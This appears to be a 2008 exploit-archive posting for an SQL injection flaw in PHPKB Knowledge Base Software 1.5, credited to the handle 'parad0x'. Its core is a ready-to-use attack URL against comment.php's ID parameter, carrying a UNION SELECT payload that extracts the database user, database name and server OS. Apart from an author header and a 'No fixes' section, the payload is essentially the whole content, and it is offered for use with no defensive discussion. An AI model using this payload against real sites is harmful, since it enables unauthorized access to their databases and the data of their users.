PHPKB 1.5 Knowledge Base (ID) SQL Injection Vulnerability

2008-04-11 00:00:00

PHPKB Knowledge Base Software (comment.php) Sql Injection Vulnerability
-------------------------------------------------------------------------------------------------
# Author : parad0x
# Home : www.inso.host.sk
# Script : PHPKB Knowledge Base Software
# Script Homepage : http://www.knowledgebase-script.com
-------------------------------------------------------------------------------------------------
http://[target]/comment.php?ID=[SQL]

-------------------------------------------------------------------------------------------------
Example:

http://www.xxx.org/comment.php?ID=-67+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*
-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.